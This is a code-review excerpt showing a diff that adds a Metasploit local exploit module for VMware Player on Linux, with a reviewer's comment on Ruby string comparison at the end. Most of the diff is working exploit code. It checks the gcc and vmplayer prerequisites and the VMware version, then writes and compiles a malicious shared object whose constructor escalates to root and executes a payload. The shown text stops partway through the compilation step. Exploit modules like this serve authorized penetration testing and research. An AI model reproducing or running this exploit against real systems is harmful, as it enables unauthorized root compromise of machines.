modules/exploits/linux/local/vmware_alsa_config.rb

```diff
@@ -0,0 +1,242 @@
+      vmplayer = cmd_exec 'which vmplayer'
+      Rex.sleep 0.5
+      if vmplayer.include? 'vmplayer'
+        vprint_good 'vmplayer is installed'
+        return true
+      else
+        print_error 'vmplayer is not installed. Exploitation will fail.'
+        return false
+      end
+    end
+    def check_gcc?
+      gcc = cmd_exec 'which gcc'
+      Rex.sleep 0.5
+      if gcc.include? 'gcc'
+        vprint_good 'gcc is installed'
+        return true
+      else
+        print_error 'gcc is not installed. Compiling will fail.'
+        return false
+      end
+    end
+    return check_vmplayer? && check_gcc?
+  end
+
+  def check
+    unless has_prereqs?
+      print_error 'Target missing prerequisites'
+      return CheckCode::Safe
+    end
+
+    config = read_file '/etc/vmware/config'
+    Rex.sleep 0.5
+
+    if config =~ /player\.product\.version\s*=\s*"([\d\.]+)"/
+      @version = Gem::Version.new $1.gsub(/\.$/, '')
+      vprint_status "VMware is version #{@version}"
+    else
+      print_error "Could not determine VMware version."
+      return CheckCode::Unknown
+    end
+
+    if @version < Gem::Version.new('12.5.6')
+      print_good 'Target version is vulnerable'
+      return CheckCode::Vulnerable
+    end
+
+    print_error 'Target version is not vulnerable'
+    CheckCode::Safe
+  end
+
+  def exploit
+    if check == CheckCode::Safe
+      print_error 'Target machine is not vulnerable'
+      return
+    end
+
+    @home_dir = cmd_exec 'echo ~'
+    Rex.sleep 0.5
+    if @home_dir.nil?
+      print_error "Could not find user's home directory"
+      return
+    end
+
+    fname = rand_text_alphanumeric rand(10) + 5
+    @base_dir = "#{datastore['WritableDir']}/.#{fname}"
+    cmd_exec "mkdir #{@base_dir}"
+    Rex.sleep 0.5
+
+    so = %Q^
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1142
+Original shared object code by jhorn
+*/
+
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <string.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/prctl.h>
+#include <err.h>
+
+extern char *program_invocation_short_name;
+
+__attribute__((constructor)) void run(void) {
+	//if (strcmp(program_invocation_short_name, "vmware-vmx"))
+	//	return;
+
+	uid_t ruid, euid, suid;
+	if (getresuid(&ruid, &euid, &suid))
+		err(1, "getresuid");
+	printf("current UIDs: %d %d %d\\n", ruid, euid, suid);
+	if (ruid == 0 || euid == 0 || suid == 0) {
+		if (setresuid(0, 0, 0) || setresgid(0, 0, 0))
+			err(1, "setresxid");
+		printf("switched to root UID and GID");
+		//system("/bin/bash");
+		system("#{@base_dir}/#{fname}.elf");
+		_exit(0);
+	}
+}
+^
+    vprint_status "Writing #{@base_dir}/#{fname}.c"
+    write_file "#{@base_dir}/#{fname}.c", so
+    Rex.sleep 0.5
+
+    vprint_status "Compiling #{@base_dir}/#{fname}.o"
+    output = cmd_exec "gcc -fPIC -shared -o #{@base_dir}/#{fname}.so #{@base_dir}/#{fname}.c -Wall -ldl -std=gnu99"
+    Rex.sleep 0.5
+    unless output.eql? ''
```

Comment:
I though `.eql?` was Ruby best practice for string comparison. Turns out `eql?` is for hash key comparison and `==` is fine from string comparison.